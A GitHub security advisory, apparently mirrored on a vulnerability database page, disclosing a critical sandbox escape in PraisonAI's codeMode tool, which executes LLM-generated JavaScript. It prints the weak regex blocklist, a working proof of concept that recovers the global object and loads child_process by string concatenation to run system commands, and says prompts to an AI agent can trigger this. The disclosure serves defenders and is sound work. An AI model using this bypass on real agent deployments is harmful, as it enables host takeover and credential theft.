GHSA-P69M-4F92-2V84

Vulnerability from github – Published: 2026-06-18 14:26 – Updated: 2026-06-18 14:26
VLAI
Summary
PraisonAI: Remote Code Execution via Sandbox Escape in `codeMode` Tool
Details

Summary

The codeMode tool in src/praisonai-ts/src/tools/builtins/code-mode.ts uses new Function() with a with(sandbox) pattern to execute LLM-generated code. The blocklist-based "sandbox" can be trivially bypassed via Function('return this')() to recover the global object, followed by global.require() with string concatenation to evade the blocklist regex. This allows full arbitrary code execution on the host system. This affects all deployments where the code-mode tool is enabled for agents.

Details

Vulnerable code (lines 187–191):

const fn = new Function(
  'sandbox',
  `with (sandbox) { ${code} }`
);
const result = fn(sandbox);

The code parameter comes from LLM tool call arguments (the execute method at line 104). Before execution, a regex-based blocklist is applied (lines 108–136):

const blockedPatterns = [
  /require\s*\(\s*['"]child_process['"]\s*\)/,
  /require\s*\(\s*['"]fs['"]\s*\)/,
  /import\s+.*from\s+['"]child_process['"]/,
  /process\.exit/,
  /eval\s*\(/,
];

Three fundamental weaknesses:

  1. with(sandbox) does not provide isolation. The with statement in JavaScript adds an object to the scope chain but does NOT prevent accessing the global object. The sandbox object sets process: undefined and require: undefined, but these are recovered via the global scope: javascript const g = Function('return this')(); g.require('child_' + 'process')

  2. Blocklist evasion via string concatenation. The regex /require\s*\(\s*['"]child_process['"]\s*\)/ requires the literal string 'child_process' or "child_process" inside require(). Using require('child_' + 'process') bypasses this because the regex sees a variable concatenation, not a literal string.

  3. Function('return this')() is not blocked. None of the blocklist patterns match Function(, return this, or global.require.

PoC

Setup: Clean checkout at commit d5f1114a, Node.js v20.20.0 (tested environment).

Positive trigger — full RCE with sandbox escape (OBSERVED OUTPUT):

// This code bypasses ALL blocklist patterns and achieves RCE:
const code = `
const Func = (function(){}).constructor;
const proc = Func('return process')();
console.log('process.version:', proc.version);
const g = Function('return this')();
const mod = 'child_' + 'process';
const cp = g.require(mod);
console.log('RCE:', cp.execSync('id').toString().trim());
`;

Observed output (executed in this environment):

OUT: process.version: v20.20.0
OUT: RCE: uid=1000(sondt23) gid=1000(sondt23) groups=1000(sondt23),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),100(users),114(lpadmin),983(docker),984(ollama)

The escape was confirmed by executing the exact code-mode sandbox pattern (new Function('sandbox', 'with (sandbox) { ... }')) with the blocklist applied first. ALL blocklist patterns were bypassed, and the id command returned the real system user ID.

Negative control — blocklist correctly catches direct require:

const code = `require('child_process')`;
// Returns: "Blocked pattern detected: require\s*\(\s*['"]child_process['"]\s*\)"

Negative control — blocklist correctly catches eval:

const code = `eval('process')`;
// Returns: "Blocked pattern detected: eval\s*\("

Cleanup: No persistence needed; the code runs in-process.

Impact

An attacker who can influence the code parameter of the codeMode tool (via crafted prompts to an AI agent using praisonai-ts) achieves full arbitrary code execution on the host system. This includes:

  • Read/write any file accessible to the process user
  • Execute arbitrary system commands via child_process
  • Exfiltrate environment variables containing API keys, tokens, and credentials
  • Install persistent backdoors by writing to startup files
  • Move laterally in containerized environments

Suggested remediation

The with(sandbox) + blocklist pattern is fundamentally insecure and cannot be fixed with regex improvements. Replace it with:

  1. Use vm module with proper context isolation:
import { createContext, runInContext } from 'vm';
const sandbox = createContext({ /* safe globals only */ });
runInContext(code, sandbox, { timeout: 5000 });
  1. Or use isolated-vm for true process-level isolation with separate V8 isolates.

  2. Or run code in a subprocess (like the Python _execute_code_sandboxed pattern already used in python_tools.py) with a clean environment and resource limits.

  3. If a blocklist approach must be retained, add patterns for:

  4. Function( / new Function
  5. constructor / __proto__ / prototype
  6. return this / return global
  7. global / globalThis / window But note: blocklist approaches are inherently fragile and will continue to have bypasses.
Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 1.7.1"
      },
      "package": {
        "ecosystem": "npm",
        "name": "praisonai"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.7.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-94"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-18T14:26:37Z",
    "nvd_published_at": null,
    "severity": "CRITICAL"
  },
  "details": "## Summary\n\nThe `codeMode` tool in `src/praisonai-ts/src/tools/builtins/code-mode.ts` uses `new Function()` with a `with(sandbox)` pattern to execute LLM-generated code. The blocklist-based \"sandbox\" can be trivially bypassed via `Function(\u0027return this\u0027)()` to recover the global object, followed by `global.require()` with string concatenation to evade the blocklist regex. This allows full arbitrary code execution on the host system. This affects all deployments where the code-mode tool is enabled for agents.\n## Details\n**Vulnerable code (lines 187\u2013191):**\n```typescript\nconst fn = new Function(\n  \u0027sandbox\u0027,\n  `with (sandbox) { ${code} }`\n);\nconst result = fn(sandbox);\n```\n\nThe `code` parameter comes from LLM tool call arguments (the `execute` method at line 104). Before execution, a regex-based blocklist is applied (lines 108\u2013136):\n\n```typescript\nconst blockedPatterns = [\n  /require\\s*\\(\\s*[\u0027\"]child_process[\u0027\"]\\s*\\)/,\n  /require\\s*\\(\\s*[\u0027\"]fs[\u0027\"]\\s*\\)/,\n  /import\\s+.*from\\s+[\u0027\"]child_process[\u0027\"]/,\n  /process\\.exit/,\n  /eval\\s*\\(/,\n];\n```\n\n**Three fundamental weaknesses:**\n\n1. **`with(sandbox)` does not provide isolation.** The `with` statement in JavaScript adds an object to the scope chain but does NOT prevent accessing the global object. The sandbox object sets `process: undefined` and `require: undefined`, but these are recovered via the global scope:\n   ```javascript\n   const g = Function(\u0027return this\u0027)();\n   g.require(\u0027child_\u0027 + \u0027process\u0027)\n   ```\n\n2. **Blocklist evasion via string concatenation.** The regex `/require\\s*\\(\\s*[\u0027\"]child_process[\u0027\"]\\s*\\)/` requires the literal string `\u0027child_process\u0027` or `\"child_process\"` inside `require()`. Using `require(\u0027child_\u0027 + \u0027process\u0027)` bypasses this because the regex sees a variable concatenation, not a literal string.\n\n3. **`Function(\u0027return this\u0027)()` is not blocked.** None of the blocklist patterns match `Function(`, `return this`, or `global.require`.\n\n## PoC\n\n**Setup:** Clean checkout at commit `d5f1114a`, Node.js v20.20.0 (tested environment).\n\n**Positive trigger \u2014 full RCE with sandbox escape (OBSERVED OUTPUT):**\n```javascript\n// This code bypasses ALL blocklist patterns and achieves RCE:\nconst code = `\nconst Func = (function(){}).constructor;\nconst proc = Func(\u0027return process\u0027)();\nconsole.log(\u0027process.version:\u0027, proc.version);\nconst g = Function(\u0027return this\u0027)();\nconst mod = \u0027child_\u0027 + \u0027process\u0027;\nconst cp = g.require(mod);\nconsole.log(\u0027RCE:\u0027, cp.execSync(\u0027id\u0027).toString().trim());\n`;\n```\n\n**Observed output (executed in this environment):**\n```\nOUT: process.version: v20.20.0\nOUT: RCE: uid=1000(sondt23) gid=1000(sondt23) groups=1000(sondt23),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),100(users),114(lpadmin),983(docker),984(ollama)\n```\n\nThe escape was confirmed by executing the exact code-mode sandbox pattern (`new Function(\u0027sandbox\u0027, \u0027with (sandbox) { ... }\u0027)`) with the blocklist applied first. ALL blocklist patterns were bypassed, and the `id` command returned the real system user ID.\n\n**Negative control \u2014 blocklist correctly catches direct require:**\n```javascript\nconst code = `require(\u0027child_process\u0027)`;\n// Returns: \"Blocked pattern detected: require\\s*\\(\\s*[\u0027\"]child_process[\u0027\"]\\s*\\)\"\n```\n\n**Negative control \u2014 blocklist correctly catches eval:**\n```javascript\nconst code = `eval(\u0027process\u0027)`;\n// Returns: \"Blocked pattern detected: eval\\s*\\(\"\n```\n\n**Cleanup:** No persistence needed; the code runs in-process.\n\n## Impact\n\nAn attacker who can influence the `code` parameter of the `codeMode` tool (via crafted prompts to an AI agent using praisonai-ts) achieves **full arbitrary code execution** on the host system. This includes:\n\n- **Read/write any file** accessible to the process user\n- **Execute arbitrary system commands** via `child_process`\n- **Exfiltrate environment variables** containing API keys, tokens, and credentials\n- **Install persistent backdoors** by writing to startup files\n- **Move laterally** in containerized environments\n\n## Suggested remediation\n\nThe `with(sandbox)` + blocklist pattern is fundamentally insecure and cannot be fixed with regex improvements. Replace it with:\n\n1. **Use `vm` module with proper context isolation:**\n```typescript\nimport { createContext, runInContext } from \u0027vm\u0027;\nconst sandbox = createContext({ /* safe globals only */ });\nrunInContext(code, sandbox, { timeout: 5000 });\n```\n\n2. **Or use `isolated-vm`** for true process-level isolation with separate V8 isolates.\n\n3. **Or run code in a subprocess** (like the Python `_execute_code_sandboxed` pattern already used in `python_tools.py`) with a clean environment and resource limits.\n\n4. If a blocklist approach must be retained, add patterns for:\n   - `Function(` / `new Function`\n   - `constructor` / `__proto__` / `prototype`\n   - `return this` / `return global`\n   - `global` / `globalThis` / `window`\n   But note: blocklist approaches are inherently fragile and will continue to have bypasses.",
  "id": "GHSA-p69m-4f92-2v84",
  "modified": "2026-06-18T14:26:37Z",
  "published": "2026-06-18T14:26:37Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-p69m-4f92-2v84"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/MervinPraison/PraisonAI"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "PraisonAI: Remote Code Execution via Sandbox Escape in `codeMode` Tool"
}



Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading…

Loading…

Loading…

Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Loading…

Detection rules are retrieved from Rulezet.

Loading…

Loading…